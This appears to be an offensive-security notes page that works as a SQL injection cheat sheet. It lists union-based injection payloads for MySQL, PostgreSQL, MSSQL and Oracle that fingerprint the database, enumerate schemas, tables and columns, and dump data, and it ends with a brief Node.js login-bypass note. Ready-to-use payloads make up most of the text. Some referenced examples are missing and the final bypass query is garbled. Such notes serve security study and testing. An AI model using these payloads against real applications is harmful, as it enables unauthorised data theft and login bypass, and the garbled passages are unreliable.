SQL Injection
SQL Injection
Every request either GET, POST, PUT, DELETE is performing CRUD operation which means Creating, Reading, Updating or Deleting data to and from the database in a dynamic web application.
Setps to identify sql injection
First Identify(Guess) the SQL query the request is performing.
Try breaking the query using any of the below characters.
Observe the difference in the response with original request and request with the above characters.
If difference is identified fix the query so it becomes the original value of the request. If this is successful sqli is identified.
Union based SQL Injection
Union based sql injection is a technique in which the result of the sql query are returned within the application's response.
First identify the number of columns
OR
OR
After this find column with suitable data type which can hold string data type.
After this we can retrive the data as follows, we can use concat operation in case only one column can hold string data type
Examining the database
This involves finding what the backend database software is and what tables and columns does the database contains.
MySQL, Microsoft: ' UNION SELECT @@version--
Oracle: ' UNION SELECT BANNER, NULL FROM v$version--
Postgresql: ' UNION SELECT version()
Finding all database names
This involves finding all database names.
MYSQL: ' UNION SELECT schema_name, NULL FROM information_schema.schemata --
POSTGRESQL ' UNION SELECT datname, NULL FROM pg_database --
MSSQL: ' UNION SELECT name, NULL FROM master.dbo.sysdatabases --
ORACLE: ' UNION SELECT DISTINCT owner, NULL FROM all_tables --
Finding tables associated with database
After finding the database names now extract tables of that database.
MYSQL: ' UNION SELECT table_name, NULL FROM information_schema.tables WHERE table_schema = 'database name' --
POSTGRESQL: ' UNION SELECT table_name, NULL FROM information_schema.tables WHERE table_schema = 'database name' --
MSSQL: ' UNION SELECT table_name, NULL FROM <database-name>.information_schema.tables --
ORACLE: ' UNION SELECT DISTINCT table_name, NULL FROM all_tables WHERE owner = 'database-name' --
Finding Columns associated with tables
MYSQL: ' UNION SELECT column_name, NULL FROM information_schema.columns WHERE table_name = 'table-name' --'
POSTGRESQL: ' UNION SELECT column_name, NULL FROM information_schema.columns WHERE table_name = 'table-name' --'
MSSQL: ' UNION SELECT column_name, NULL FROM information_schema.columns WHERE table_name = 'table-name' --'
ORACLE: ' UNION SELECT column_name, NULL FROM all_tab_columns WHERE table_name = 'FLAGS' --'
Dumping column values
Here we are currently in one database and dumping values from columns of another database's table. In other cases if we are in same database and need to dump columns from table of same database we can just use select column, column from table.
MYSQL: ' UNION SELECT column1, column2 FROM database-name.table-name --'
MSSQL: ' UNION SELECT column1, column2 FROM database-name.table-name --'
POSTGRESQL: ' UNION SELECT column1, column2 FROM database-name.table-name --'
Oracle: ' UNION SELECT column1, column2 FROM database-name.table-name --'
Note: If we are in same database and need to find tables of same database we can just do ' UNION SELECT table_name FROM information_schema.tables-- and if we are in one database and we need to find tables of different database we can first find all databases and later use WHERE clause' UNION SELECT table_name FROM information_schema.tables WHERE table_schema= 'database_name'--
Dump values on a single column
IF we need to dump values on a single column we can use concat operation.
Oracle: 'foo'||'bar'
Microsoft: 'foo'+'bar'
PostgreSQL: 'foo'||'bar'
MySQL: 'foo' 'bar' CONCAT('foo','bar')
NodeJS SQLI via type confusion
Login bypass
The above query becomes SELECT FROM users WHERE username=admin AND password = password = 1 here value of password is assigned 1 password = password is 1=1 which is true which bypasses login.
Last updated